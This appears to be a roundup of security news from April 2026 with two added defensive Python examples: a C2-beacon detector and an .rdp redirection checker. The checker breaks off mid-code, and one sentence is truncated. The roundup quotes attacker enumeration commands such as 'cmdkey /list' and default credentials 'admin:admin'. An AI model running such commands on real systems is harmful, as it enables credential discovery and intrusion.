2026-04-18 AI startup news
Three Microsoft Defender Zero-Days Actively Exploited; Two Still Unpatched
Huntress is warning that threat actors are exploiting three recently disclosed security flaws in Microsoft Defender to gain elevated privileges on compromised systems. The activity involves the exploitation of three vulnerabilities codenamed BlueHammer (requires GitHub sign-in), RedSun, and UnDefend, all of which were released as zero-days by a researcher known as Chaotic Eclipse (aka Nightmare-Eclipse) in response to Microsoft’s handling of the vulnerability disclosure process. While both BlueHammer and RedSun are local privilege escalation (LPE) flaws affecting Microsoft Defender, UnDefend can be used to trigger a denial-of-service (DoS) condition and effectively block definition updates. Microsoft moved to address BlueHammer as part of its Patch Tuesday updates released earlier this week.
The vulnerability is being tracked under the CVE identifier CVE-2026-33825. However, the other two flaws do not have a fix as of writing. In a series of posts shared on X, Huntress said it observed all three flaws being exploited in the wild, with BlueHammer being weaponized since April 10, 2026, followed by the use of RedSun and UnDefend proof-of-concept (PoC) exploits on April 16. “These invocations followed after typical enumeration commands: whoami /priv, cmdkey /list, net group, and others that indicate hands-on-keyboard threat actor activity,” it added.
The cybersecurity vendor said it has taken steps to isolate the affected organization to prevent further post-exploitation. When reached for comment, Microsoft confirmed that the BlueHammer exploit has been addressed via CVE-2026-33825. “Microsoft has a customer commitment to investigate reported security issues and update impacted devices to protect customers as soon as possible,” the spokesperson said. “We also support coordinated vulnerability disclosure, a widely adopted industry practice that helps ensure issues are carefully investigated and addressed before public disclosure, supporting both customer protection and the security research community.” (The story was updated after publication to include a response from Microsoft.) Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Google Blocks 8.3B Policy-Violating Ads in 2025, Launches Android 17 Privacy Overhaul
Google this week announced a new set of Play policy updates to strengthen user privacy and protect businesses against fraud, even as it revealed it blocked or removed over 8.3 billion ads globally and suspended 24.9 million accounts in 2025. The new policy updates relate to contact and location permissions in Android, allowing third-party apps to access contact lists and a user’s location in a more privacy-friendly manner. This includes a new Contact Picker, which offers a standardized, secure, and searchable interface for contact selection. “This feature allows users to grant apps access only to the specific contacts they choose, aligning with Android’s commitment to data transparency and minimized permission footprints,” Google said.
Previously, apps requiring access to a specific user’s contacts relied on READ_CONTACTS, an overly broad permission that granted apps the ability to access all contacts and their associated information. With the latest change introduced in Android 17, apps can specify which fields from a contact they need, such as phone numbers or email addresses, as opposed to reading the entire record. The updated policy will require all applicable apps to use the picker (or the Android Sharesheet) as the main way to access users’ contacts, with READ_CONTACTS now reserved only for apps that can’t function without it. Developers are advised to entirely remove the READ_CONTACTS permission from the app manifest declaration if the app targets Android 17 (currently in beta) and later.
“If your app requires full, ongoing access to a user’s contact list to function, you must justify this need by submitting a Play Developer Declaration in the Play Console,” Google noted. The second policy change revolves around a streamlined location button that Google has introduced in Android 17 that enables apps to request one-time access to a user’s precise location. In doing so, it allows the user to make a better choice about how much information they want to share and for what duration. What’s more, a persistent indicator will appear to alert a user every time a non-system app accesses their location.
To comply with this update, developers are being urged to review their apps’ location usage to ensure that they are requesting the minimum amount of location data necessary for them to function. “If your app targets Android 17 and above and uses precise location for discrete, temporary actions, implement the location button by adding the onlyForLocationButton flag in your manifest,” the tech giant said. “If your app requires persistent, precise location to function, you will need to submit a Play Developer Declaration in Play Console to show why the new button or coarse location isn’t sufficient for your app’s core features.” The declaration form is expected to be available before October 2026, with pre-review checks in the Play Console to go live starting October 27 to identify potential contacts or location permissions policy issues. Google is also implementing a secure way for businesses to transfer ownership of their apps through a native account transfer feature built into Play Console so as to stay protected against fraud.
The company is recommending that app developers handle account ownership changes through this feature starting May 27, 2026. “That means that unofficial transfers (like sharing login credentials or buying and selling accounts on third-party marketplaces), which leave your business vulnerable, are not permitted,” it said.
Google Takes Aim at Malvertising
The changes to the Android ecosystem come as Google said it’s harnessing the capabilities of Gemini, its artificial intelligence (AI) model, to detect and block malicious ads on its platform. More than 99% of policy-violating ads were caught by its systems in 2025 before they were shown to users, it noted.
“Unlike earlier keyword-based systems, our latest models better understand intent, helping us spot malicious content and preemptively block it, even when it’s designed to evade detection,” Keerat Sharma, vice president and general manager of Ads Privacy and Safety at Google, said in a post shared with The Hacker News. Taken together, the company removed or blocked 602 million ads and 4 million accounts that were associated with scams or scam-related activity last year. More than 4.8 billion ads were restricted, and over 480 million web pages were actioned for attempting to serve sexually explicit content, weapons promotion, online gambling, alcohol, tobacco, and malware. In contrast, Google suspended over 39.2 million advertiser accounts in 2024, and stopped 5.1 billion bad ads, restricted 9.1 billion ads, and blocked or restricted ads on 1.3 billion pages.
“Bad actors are using generative AI to create deceptive ads at scale, and Gemini helps us detect and block them in real time,” Google said. “By the end of last year, the majority of Responsive Search Ads created in Google Ads were reviewed instantly, and harmful content was blocked at submission – a capability we plan to bring to more ad formats this year.”
NIST Limits CVE Enrichment After 263% Surge in Vulnerability Submissions
The National Institute of Standards and Technology (NIST) has announced changes to the way it handles Common Vulnerabilities and Exposures (CVEs) listed in its National Vulnerability Database (NVD), stating it will only enrich those that fulfil certain conditions owing to an explosion in CVE submissions. “CVEs that do not meet those criteria will still be listed in the NVD but will not automatically be enriched by NIST,” it said. “This change is driven by a surge in CVE submissions, which increased 263% between 2020 and 2025. We don’t expect this trend to let up anytime soon.” The prioritization criteria outlined by NIST, which went into effect on April 15, 2026, are as follows:
- CVEs appearing in the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog.
- CVEs for software used within the federal government.
- CVEs for critical software as defined by Executive Order 14028: this includes software that’s designed to run with elevated privilege or managed privileges, has privileged access to networking or computing resources, controls access to data or operational technology, and operates outside of normal trust boundaries with elevated access.
Any CVE submission that doesn’t meet these thresholds will be marked as “Not Scheduled.” The idea, NIST said, is to focus on CVEs that have the maximum potential for widespread impact.
“While CVEs that do not meet these criteria may have a significant impact on affected systems, they generally do not present the same level of systemic risk as those in the prioritized categories,” it added. NIST said the CVE submissions during the first three months of 2026 are nearly one-third higher than they were last year, and it’s working faster than ever to enrich the submissions. It also said it enriched nearly 42,000 CVEs in 2025, which was 45% more than any prior year. In cases where a high-impact CVE has been categorized as unscheduled, users have the option to request enrichment by sending an email to “nvd@nist[.]gov.” NIST is expected to review those requests and schedule the CVEs for enrichment as applicable.
Changes have also been instituted for various other aspects of NVD operations. These include:
- NIST will no longer routinely provide a separate severity score for a CVE where the CVE Numbering Authority (CNA) has already provided one.
- A modified CVE will be reanalyzed only if the modification “materially impacts” the enrichment data. Users can request that specific CVEs be reanalyzed by sending an email to the same address listed above.
- All unenriched CVEs currently in the backlog with an NVD publish date earlier than March 1, 2026, will be moved into the “Not Scheduled” category. This does not apply to CVEs that are already in the KEV catalog.
- NIST has updated the CVE status labels and descriptions, as well as the NVD Dashboard, to accurately reflect the status of all CVEs and other statistics in real time.
“The announcement from NIST doesn’t come as a major surprise, given they’ve previously telegraphed intent to move to a ‘risk-based’ prioritization model for CVE enrichment,” Caitlin Condon, vice president of security research at VulnCheck, said in a statement shared with The Hacker News.
“On the plus side, NIST is clearly and publicly setting expectations for the community amid a huge and escalating rise in new vulnerabilities. On the other hand, a significant portion of vulnerabilities now appear to have no clear path to enrichment for organizations relying on NIST as their authoritative (or only) source of CVE enrichment data.” Data from the cybersecurity company shows that there are still approximately 10,000 vulnerabilities from 2025 without a CVSS score. NIST is estimated to have enriched 14,000 ‘CVE-2025’ vulnerabilities, accounting for about 32% of the 2025 CVE population. “This announcement underscores what we already know: We no longer live in a world where manual enrichment of new vulnerabilities is a feasible or effective strategy,” Condon said.
“Even without AI-driven vulnerability discovery accelerating CVE volume and validation challenges, today’s threat climate unequivocally demands distributed, machine-speed approaches to vulnerability identification and enrichment, along with a genuinely global perspective on risk that acknowledges the interconnected, interdependent nature of the worldwide software ecosystem – and the attackers who target it. After all, what we don’t prioritize for ourselves, adversaries will prioritize for us.” David Lindner, chief information security officer of Contrast Security, said NIST’s decision to only prioritize high-impact vulnerabilities marks the end of an era where defenders could leverage a single government-managed database to assess security risks, forcing organizations to pivot to a proactive approach to risk management that’s driven by threat intelligence. “Modern defenders must move beyond the noise of total CVE volume and instead focus their limited resources on the CISA KEV list and exploitability metrics,” Lindner said. “While this transition may disrupt legacy auditing workflows, it ultimately matures the industry by demanding that we prioritize actual exposure over theoretical severity.
Relying on a curated subset of actionable data is far more effective for national resilience than maintaining a comprehensive but unmanageable archive of every minor bug.”
Operation PowerOFF Seizes 53 DDoS Domains, Exposes 3 Million Criminal Accounts
An international law enforcement operation has taken down 53 domains and arrested four people in connection with commercial distributed denial-of-service (DDoS) operations that were used by more than 75,000 cybercriminals. The ongoing effort, dubbed Operation PowerOFF, disrupted access to the DDoS-for-hire services, took down the technical infrastructure supporting them, and obtained access to databases containing over 3 million criminal user accounts. Authorities are also sending warning emails and letters to the identified criminal users, and 25 search warrants have been issued. As many as 21 countries participated in the action: Australia, Austria, Belgium, Brazil, Bulgaria, Denmark, Estonia, Finland, Germany, Japan, Latvia, Lithuania, Luxembourg, the Netherlands, Poland, Portugal, Sweden, Thailand, the U.K., and the U.S.
“Booter services allow users to launch DDoS attacks against targeted websites, servers, or networks,” Europol said in a statement. “Their infrastructure is made up of servers, databases, and other technical components that make DDoS-for-hire activities possible. By seizing these infrastructures, authorities were able to hinder these criminal operations and prevent further damage to victims.” The agency described DDoS-for-hire as one of the most prolific and easily accessible trends in cybercrime, as it allows even individuals with little to no technical knowledge to execute malicious attacks at scale and inflict significant damage to busin Europol also noted that DDoS activity can originate from well-resourced and skilled threat actors, who could rely on such services to customize or optimize their illicit activities. DDoS attacks often tend to target various web-based services, with the motivations behind them as varied as they are broad.
This ranges from simple curiosity and financial gain through extortion to hacktivism driven by ideological reasons and disruption of competitors’ services. Some operators of these services have been found to mask their true motives and escape law enforcement scrutiny by disguising them as stress-testing tools. The development marks the latest step taken by authorities to dismantle criminal DDoS-for-hire infrastructures worldwide as part of PowerOFF. In August 2025, the U.S. government announced the takedown of a DDoS botnet called RapperBot that was used to conduct large-scale disruptive attacks targeting victims in over 80 countries since at least 2021.
U.S. Authorities Disrupt DDoS IoT Botnet Services
In a parallel announcement, the U.S. Department of Justice (DoJ) said court-authorized actions were undertaken to disrupt some of the world’s leading DDoS Internet of Things (IoT) botnet services as part of its ongoing commitment to hold DDoS botnet administrators responsible and seize websites that allow paying users to launch potent DDoS attacks.
These attacks are designed to inundate websites, servers, and networks with junk traffic, degrading access to legitimate services, causing performance bottlenecks and, in some cases, rendering them completely offline. The DoJ said U.S. authorities seized services associated with eight DDoS-for-hire domains, including Vac Stresser and Mythical Stress, both of which claimed to launch thousands of DDoS attacks per day. It also said an advertising campaign has been launched to deter potential cybercriminals searching for DDoS services in the U.S. and elsewhere and to alert the public about the illegality of DDoS attacks. The names of the domains associated with the booter services are listed below:
- vacstresser[.]net
- mythicalstress[.]com
Visitors to the sites are now greeted by a seizure banner that reads: “DDoS attacks are illegal. For years law enforcement agencies around the world have seized booter databases, arrested administrators, and collected information relating to the operation of these services, including information on the customers of these services. Anyone operating or utilizing DDoS services is subject to investigation, prosecution, and other law enforcement action.”
Apache ActiveMQ CVE-2026-34197 Added to CISA KEV Amid Active Exploitation
A recently disclosed high-severity security flaw in Apache ActiveMQ Classic has come under active exploitation in the wild, per the U.S. Cybersecurity and Infrastructure Security Agency (CISA). To that end, the agency has added the vulnerability, tracked as CVE-2026-34197 (CVSS score: 8.8), to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by April 30, 2026. CVE-2026-34197 has been described as a case of improper input validation that could lead to code injection, effectively allowing an attacker to execute arbitrary code on susceptible installations.
According to Horizon3.ai’s Naveen Sunkavally, CVE-2026-34197 has been “hiding in plain sight” for 13 years. “An attacker can invoke a management operation through ActiveMQ’s Jolokia API to trick the broker into fetching a remote configuration file and running arbitrary OS commands,” Sunkavally added. “The vulnerability requires credentials, but default credentials (admin:admin) are common in many environments. On some versions (6.0.0–6.1.1), no credentials are required at all due to another vulnerability, CVE-2024-32114, which inadvertently exposes the Jolokia API without authentication.
In those versions, CVE-2026-34197 is effectively an unauthenticated RCE.” The vulnerability impacts the following versions:
- Apache ActiveMQ Broker (org.apache.activemq:activemq-broker) before 5.19.4
- Apache ActiveMQ Broker (org.apache.activemq:activemq-broker) 6.0.0 before 6.2.3
- Apache ActiveMQ (org.apache.activemq:activemq-all) before 5.19.4
- Apache ActiveMQ (org.apache.activemq:activemq-all) 6.0.0 before 6.2.3
Users are advised to upgrade to version 5.19.4 or 6.2.3, which address the issue. There are currently no details on how CVE-2026-34197 is being exploited in the wild, but SAFE Security, in a report published this week, revealed that threat actors are actively targeting exposed Jolokia management endpoints in Apache ActiveMQ Classic deployments. Telemetry data gathered by Fortinet FortiGuard Labs has also uncovered dozens of exploitation attempts over the past couple of days, with the activity peaking on April 14, 2026. The findings once again demonstrate that exploitation timelines continue to collapse as attackers pounce on newly disclosed vulnerabilities at an alarmingly faster rate and breach systems before they can be patched.
Apache ActiveMQ is a popular target for attack, with flaws in the open-source message broker repeatedly exploited in various malware campaigns since 2021. In August 2025, a critical vulnerability in ActiveMQ (CVE-2023-46604, CVSS score: 10.0) was weaponized by unknown actors to drop a Linux malware called DripDropper. “Given ActiveMQ’s role in enterprise messaging and data pipelines, exposed management interfaces present a high-impact risk, potentially enabling data exfiltration, service disruption, or lateral movement,” SAFE Security said. “Organizations should audit all deployments for externally accessible Jolokia endpoints, restrict access to trusted networks, enforce strong authentication, and disable Jolokia where it is not required.”
Newly Discovered PowMix Botnet Hits Czech Workers Using Randomized C2 Traffic
Cybersecurity researchers have warned of an active malicious campaign that’s targeting the workforce in the Czech Republic with a previously undocumented botnet dubbed PowMix since at least December 2025. “PowMix employs randomized command-and-control (C2) beaconing intervals, rather than persistent connection to the C2 server, to evade the network signature detections,” Cisco Talos researcher Chetan Raghuprasad said in a report published today. “PowMix embeds the encrypted heartbeat data along with unique identifiers of the victim machine into the C2 URL paths, mimicking legitimate REST API URLs. PowMix has the capability to remotely update the new C2 domain to the botnet configuration file dynamically.” The attack chain begins with a malicious ZIP file, likely delivered via a phishing email, to activate a multi-stage infection chain that drops PowMix.
Specifically, it involves a Windows Shortcut (LNK) that’s used to launch a PowerShell loader, which then extracts the malware embedded within the archive, decrypts it, and runs it in memory. The never-before-seen botnet is designed to facilitate remote access, reconnaissance, and remote code execution, while establishing persistence by means of a scheduled task. At the same time, it verifies the process tree to ensure that another instance of the same malware is not running on the compromised host. PowMix’s remote management logic allows it to process two different kinds of commands sent from the C2 server.
- Any response not prefixed with # causes PowMix to shift to arbitrary execution mode and decrypt and run the obtained payload.
- #KILL initiates a self-deletion routine and wipes traces of all malicious artifacts.
- #HOST enables C2 migration to a new server URL.
In parallel, it also opens a decoy document with compliance-themed lures as a distraction mechanism. The lure documents reference legitimate brands like Edeka and include compensation data and valid legislative references, potentially in an effort to enhance their credibility and trick recipients, like job aspirants.
Talos said the campaign shares some level of tactical overlap with a campaign dubbed ZipLine that was disclosed by Check Point in late August 2025 as targeting supply chain-critical manufacturing companies with an in-memory malware called MixShell. This includes the use of the same ZIP-based payload delivery, scheduled task persistence, and the abuse of Heroku for C2. That said, no final payloads have been observed beyond the botnet malware itself, leaving questions about its exact motives unanswered. “PowMix avoids persistent connections to the C2 server,” Talos said.
“Instead, it implements a jitter via the Get-Random PowerShell command to vary the beaconing intervals, initially between 0 and 261 seconds and subsequently between 1,075 and 1,450 seconds. This technique attempts to prevent detection of C2 traffic through predictable network signatures.”
The disclosure comes as Bitsight sheds light on the infection chain associated with the RondoDox botnet, highlighting the malware’s evolving capabilities to illicitly mine cryptocurrency on infected systems using XMRig on top of the existing distributed denial-of-service (DDoS) attack functionality. The findings paint the picture of an actively maintained malware that offers improved evasion, better resilience, aggressive competition removal, and an expanded feature set. RondoDox is capable of exploiting over 170 known vulnerabilities in various internet-facing applications to obtain initial access and drop a shell script that performs basic anti-analysis and removes competing malware before dropping the appropriate botnet binary for the architecture.
The malware “does multiple checks and implements techniques to hinder analysis, which include the usage of nanomites, renaming/removing files, killing processes, and actively checking for debuggers during execution,” Bitsight Principal Research Scientist João Godinho said. “The bot is able to run DoS attacks at the internet, transport and application layer, depending on the command and arguments issued by the C2.”
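The randomized beaconing Talos describes for PowMix (intervals drawn from a bounded window, and a fresh REST-looking path per request) still leaves a statistical footprint in proxy logs. The Python below is an added example, not Talos's code or a detection from the report: it groups constructed sample log lines by source and destination, measures inter-request gaps, and flags sessions whose gaps are variable yet bounded, additionally checking them against the 0–261 s and 1,075–1,450 s windows quoted above. Hostnames, paths and thresholds are invented for illustration.

```python
"""Flag proxy-log sessions that look like jittered C2 beaconing.

Heuristic (an assumption of this example, not a Talos signature): beacon
gaps are random but confined to a band, and each request uses a distinct
path because heartbeat data is embedded in the URL.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev

# Beacon windows (seconds) quoted in the Talos report: 0-261 at first, then 1075-1450.
KNOWN_WINDOWS = ((0, 261), (1075, 1450))
MIN_REQUESTS = 5        # fewer requests give no meaningful interval statistics
MAX_REL_SPREAD = 0.5    # (max - min) / max of the gaps: a bounded jitter band
MIN_CV = 0.02           # coefficient of variation below this means fixed, not jittered
MIN_PATH_RATIO = 0.8    # share of distinct paths among the session's requests

# Constructed proxy log (not real telemetry): "<iso-timestamp> <src> <dst> <path>".
# ws-17 beacons every 1200/1380/1100/1420/1290 s to a new path each time (PowMix-like);
# ws-22 is ordinary browsing; ws-31 is a fixed 300 s health poller (regular, not jittered).
SAMPLE_LOG = """\
2026-04-17T08:00:00Z ws-17 api.updates-cdn.test /v2/sync/3f9a1c2e
2026-04-17T08:20:00Z ws-17 api.updates-cdn.test /v2/sync/9bd02e71
2026-04-17T08:43:00Z ws-17 api.updates-cdn.test /v2/sync/c44e10aa
2026-04-17T09:01:20Z ws-17 api.updates-cdn.test /v2/sync/77ab3d90
2026-04-17T09:25:00Z ws-17 api.updates-cdn.test /v2/sync/e1f0b6c3
2026-04-17T09:46:30Z ws-17 api.updates-cdn.test /v2/sync/5a9d2f08
2026-04-17T08:00:05Z ws-22 www.news.test /index.html
2026-04-17T08:00:06Z ws-22 www.news.test /style.css
2026-04-17T08:00:06Z ws-22 www.news.test /logo.png
2026-04-17T08:12:00Z ws-22 www.news.test /article/42
2026-04-17T09:30:00Z ws-22 www.news.test /index.html
2026-04-17T08:00:00Z ws-31 metrics.corp.test /health
2026-04-17T08:05:00Z ws-31 metrics.corp.test /health
2026-04-17T08:10:00Z ws-31 metrics.corp.test /health
2026-04-17T08:15:00Z ws-31 metrics.corp.test /health
2026-04-17T08:20:00Z ws-31 metrics.corp.test /health
"""


def parse_log(text):
    """Return {(src, dst): [(timestamp, path), ...]} with each session sorted by time."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, path = line.split()
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        sessions[(src, dst)].append((when, path))
    for events in sessions.values():
        events.sort()
    return dict(sessions)


def intervals_seconds(events):
    """Gaps in seconds between consecutive requests of one session."""
    times = [t for t, _ in events]
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def fits_known_window(gaps, slack=0.05):
    """True if every gap lands inside one of the reported beacon windows (with slack)."""
    for lo, hi in KNOWN_WINDOWS:
        lo_s, hi_s = lo * (1 - slack), hi * (1 + slack)
        if all(lo_s <= g <= hi_s for g in gaps):
            return True
    return False


def analyze_session(events):
    """Score one session; verdict is jittered-beacon, fixed-interval, benign or insufficient."""
    gaps = intervals_seconds(events)
    if len(events) < MIN_REQUESTS or not gaps or max(gaps) == 0:
        return {"verdict": "insufficient"}
    rel_spread = (max(gaps) - min(gaps)) / max(gaps)   # 0 = perfectly regular
    cv = pstdev(gaps) / mean(gaps)                      # 0 = no jitter at all
    bounded_jitter = rel_spread <= MAX_REL_SPREAD and cv >= MIN_CV
    known = fits_known_window(gaps)
    path_ratio = len({p for _, p in events}) / len(events)
    unique_paths = path_ratio >= MIN_PATH_RATIO
    if bounded_jitter and (known or unique_paths):
        verdict = "jittered-beacon"
    elif cv < MIN_CV:
        verdict = "fixed-interval"
    else:
        verdict = "benign"
    return {"verdict": verdict, "requests": len(events), "rel_spread": round(rel_spread, 3),
            "cv": round(cv, 3), "fits_known_window": known, "path_ratio": round(path_ratio, 2)}


def analyze_log(text):
    """Analyze every (src, dst) session found in the log text."""
    return {key: analyze_session(events) for key, events in parse_log(text).items()}


def suspicious_sessions(text):
    """Return the (src, dst) pairs whose traffic looks like jittered C2 beaconing."""
    return sorted(k for k, r in analyze_log(text).items() if r["verdict"] == "jittered-beacon")


if __name__ == "__main__":
    for key, result in analyze_log(SAMPLE_LOG).items():
        print(key, result)
```

The relative-spread and path-ratio thresholds are starting points; tune them against your own proxy baseline, since CDN polling and some SaaS clients also produce bounded, irregular request gaps.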
ThreatsDay Bulletin: Defender 0-Day, SonicWall Brute-Force, 17-Year-Old Excel RCE and 15 More Stories
You know that feeling when you open your feed on a Thursday morning and it’s just… a lot? Yeah. This week delivered.
We’ve got hackers getting creative in ways that are almost impressive if you ignore the whole “crime” part, ancient vulnerabilities somehow still ruining people’s days, and enough supply chain drama to fill a season of television nobody asked for. Not all bad though. Some threat actors got exposed with receipts, a few platforms finally tightened things up, and there’s research in here that’s genuinely worth your time. Grab your coffee and keep scrolling.
Targeted wallet breach Zerion Hack Likely Linked to North Korea Cryptocurrency wallet service Zerion has disclosed that one of its team member’s devices was compromised, resulting in the theft of approximately $100K in stolen funds from internal company hot wallets. The company noted that user funds, Zerion apps, or infrastructure were not impacted by the breach. The team member is said to have been the target of an artificial intelligence (AI)-enabled social engineering attack carried by a North Korean threat actor tracked as UNC1069 . The hacking group was recently attributed to the poisoning of the popular Axios npm package.
“This allowed the attacker to gain access to some of the team members’ logged-in sessions and credentials as well as private keys to company hot wallets used for testing and internal purposes,” Zerion said. “This was not an opportunistic attack. The actor is clearly sophisticated and well-resourced. They planned the attack thoroughly.” Anonymous age checks E.U.
Plans Bloc-Wide Age Verification App The European Union has announced that it will soon roll out a new online age verification app to allow users to prove their age when accessing online platforms. Users can set it up by downloading the app on their Android or iOS device using a passport or ID card. The Commission has emphasized that the app will respect users’ privacy. “Users will prove their age without revealing any other personal information,” President of the European Commission, Ursula von der Leyen, said .
“Put simply, it is completely anonymous: users cannot be tracked. Third, the app works on any device – phone, tablet, computer, you name it. And, finally, it is fully open source – everyone can check the code.” The development comes as countries around the world are undertaking various stages of regulatory action to keep cyberspace a safer place for children and minors and protect them from serious harm. New Defender zero-day BlueHammer Author Releases RedSun Exploit A researcher using the alias “Chaotic Eclipse” released a zero-day exploit called BlueHammer earlier this month following Microsoft’s handling of the vulnerability disclosure process.
Although the issue appears to have been fixed as of this month’s Patch Tuesday release (CVE-2026-33825), the researcher has since disclosed a new unpatched Microsoft Defender privilege escalation vulnerability . The exploit has been codenamed RedSun . “This works 100% reliably to go from unprivileged user to SYSTEM against Windows 11 and Windows Server with April 2026 updates, as well as Windows 10, as long as you have Windows Defender enabled,” security researcher Will Dormann said. A third exploit released by “Chaotic Eclipse,” referred to as UnDefend, also targets Defender and triggers a denial-of-service (DoS) condition.
“This tool, while stupid, is quite dangerous [be]cause if paired with BlueHammer, your machine is basically a hole, anyone can run anything with administrator privileges andwindows defender can’t really do much about it,” the researcher said . “Considering that’s the whole purpose of an antivirus, you’re better off removing it LOL.” Legacy Excel RCE active 17-Year-Old Critical Excel flaw Under Exploit The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added an old remote code execution vulnerability impacting Microsoft Office to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the shortcoming by April 28, 2026. The vulnerability in question is CVE-2009-0238, which has a CVSS score of 8.8.
“Microsoft Office Excel contains a remote code execution vulnerability that could allow an attacker to take complete control of an affected system if a user opens a specially crafted Excel file that includes a malformed object,” CISA said . sudo now requires password Raspberry Pi Disables Passwordless sudo Raspberry Pi has released version 6.2 of its Raspberry Pi OS, which introduces one significant change: it disables passwordless sudo by default. As a result, users who run a sudo command for administrator-level access will be prompted to enter the current user’s password. The change affects only new installations; existing setups are untouched.
“Given the ever-increasing threat of cybercrime, we continually review the security of Raspberry Pi OS to ensure it is sufficiently robust to withstand potential attacks,” Raspberry Pi said . “This is always a tricky balance, as anything that makes the operating system more secure will invariably inconvenience legitimate users to some extent, so we try to keep such changes to a minimum. This particular security update is one that many users may not even notice, but it will affect some.” Stealth C2 frameworks uncovered ObsidianStrike and ArchangelC2 Frameworks Discovered A previously undocumented command-and-control (C2) framework dubbed ObsidianStrike has been deployed on infrastructure belonging to a Brazilian law firm. “Only two instances of ObsidianStrike exist on the entire internet,” Breakglass Intelligence said .
“The framework has zero presence on GitHub, zero samples on VirusTotal or MalwareBazaar, and near-zero vendor detection. This is a fully private, Portuguese-language C2 built for targeted Windows operations, hidden behind a victim organization’s domain.” Also discovered by the security vendor is ArchangelC2 , a C2 panel behind an industrial-scale ScreenConnect remote-access fraud campaign that has been operational since November 2024. Fake app drains $9.5M Apple Removes Fake Ledger App A fake Ledger app managed to slip onto the Apple App Store, draining $9.5 million in cryptocurrency from more than 50 victims between April 7 and April 13, 2026. The app, named Ledger Live , was released by a developer, “SAS Software Company,” and published under “Leva Heal Limited.” Users who downloaded the fraudulent app were tricked into entering their seed phrases, giving attackers full access to their wallets and allowing them to send digital assets to external addresses under their control.
While Apple has since removed the macOS app from the store, questions remain as to how it managed to pass the company’s review process. In more Apple-related news, the company has also removed a data harvesting app called Freecash from its App Store after it was deceptively advertised as a way to “make money just by scrolling TikTok,” while collecting sensitive information from users. This included details about a user’s race, religion, sex life, sexual orientation, health, and other biometrics. Once installed, however, instead of the promised functionality, users were routed to a roster of mobile games where they are offered cash rewards for completing time-limited in-game challenges.
The app continues to be available on the Google Play Store.

Localized ransomware campaign
Turkey Targeted by JanaWare Ransomware

Cybercriminals are using a new ransomware strain called JanaWare to target people in Turkey, according to Acronis. The attack leverages phishing emails containing a Google Drive link that paves the way for the download and subsequent execution of a malicious JAR file via javaw.exe. The payload is a customized Adwind (aka AlienSpy, jRAT, or Sockrat) variant with polymorphic characteristics that’s used to deliver the ransomware module.
The malware implements geofencing and environment filtering to ensure that the compromised systems match the Turkish language and region. While none of these tricks are particularly novel or advanced, they continue to work against unprotected small targets. It’s unclear how many people or businesses might have fallen prey to the scheme. The low-stakes, localized approach has allowed the campaign to persist since at least 2020 without any major disruption.
“Victimology appears to primarily include home users and small to medium-sized businesses. Initial access is assessed to occur via phishing emails delivering malicious Java archives,” the company said. “Ransom demands observed in analyzed samples range from $200–$400, consistent with a low-value, high-volume monetization approach.”

Crackdown on navigation abuse
Google Takes Aim at Back Button Hijacking

Google said it’s introducing a new spam policy for “back button hijacking,” which occurs when a site interferes with a user’s browser navigation and prevents them from using their back button to immediately get back to the page they came from. Instead, the hijack could redirect users to sketchy sites or other pages they have never visited before.
“Back button hijacking interferes with the browser’s functionality, breaks the expected user journey, and results in user frustration,” Google said. “Pages that are engaging in back button hijacking may be subject to manual spam actions or automated demotions, which can impact the site’s performance in Google Search results. To give site owners time to make any needed changes, we’re publishing this policy two months in advance of enforcement on June 15, 2026.”

Stealth cloud credential theft
APT41 Uses New Credential Stealer

An undetectable, purpose-built ELF backdoor targeting Linux cloud workloads across Amazon Web Services (AWS), Google Cloud, Microsoft Azure, and Alibaba Cloud environments has been attributed to the China-linked hacking group known as APT41. “The implant uses SMTP port 25 as a covert command-and-control channel, harvests cloud provider credentials and metadata, and phones home to three Alibaba-themed typosquat domains hosted on Alibaba Cloud infrastructure in Singapore,” Breakglass Intelligence said.
“A selective C2 handshake validation mechanism renders the server invisible to conventional scanning tools like Shodan and Censys.”

RDP phishing hardening
Microsoft Debuts New Protections Against Malicious RDP Files

Starting with the April 2026 security update (CVE-2026-26151), Microsoft has introduced new Windows protections to defend against phishing attacks that abuse Remote Desktop connection (RDP) files, adding security warnings and turning off redirections by default. “Malicious actors misuse this capability by sending RDP files through phishing emails,” Microsoft said. “When a victim opens the file, their device silently connects to a server controlled by the attacker and shares local resources, giving the attacker access to files, credentials, and more.” Russian hacking groups like APT29 have weaponized RDP configuration files to target Ukrainian government agencies, enterprises, and military entities in the past.

Plugin supply chain breach
WordPress Plugin Suite Poisoned After Acquisition to Push Malware

Unknown threat actors have staged a supply chain attack on a WordPress plug-in maker called Essential Plugin (formerly WP Online Support). After acquiring it from the original developers in early 2025 in a six-figure deal, they planted a backdoor in August and weaponized it early this month to distribute malicious payloads to any website with the plug-ins installed.
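For the RDP-file protections described in the Microsoft item above, here is an added example (not Microsoft’s code) of a small checker that parses a .rdp file and reports which local-resource redirections it enables, the kind of setting the quoted warning is about. The setting names are the documented mstsc .rdp settings, treated here as an assumption to extend locally; the sample file, the external host 203.0.113.10 and the username are constructed.

```python
"""Flag resource redirections in a Remote Desktop (.rdp) connection file.

Added example, not Microsoft code. Assumes the standard .rdp line syntax
"name:type:value" (type i = integer, s = string); the redirection setting
names below are the documented mstsc settings, but treat the list as an
assumption and extend it for your environment.
"""
from __future__ import annotations

# Settings that expose local resources to the remote host when enabled.
RISKY_SETTINGS = {
    "drivestoredirect": "local drives are mapped into the remote session",
    "redirectclipboard": "clipboard contents are shared with the remote host",
    "redirectprinters": "local printers are exposed to the remote host",
    "redirectsmartcards": "smart cards are forwarded for authentication",
    "redirectcomports": "serial ports are forwarded",
    "devicestoredirect": "plug-and-play devices are forwarded",
    "usbdevicestoredirect": "USB devices are forwarded",
    "redirectwebauthn": "WebAuthn authenticators are forwarded",
}

# Constructed sample: a phishing-style .rdp file pointing at an external host.
SAMPLE_RDP = """\
screen mode id:i:2
full address:s:203.0.113.10
username:s:contractor
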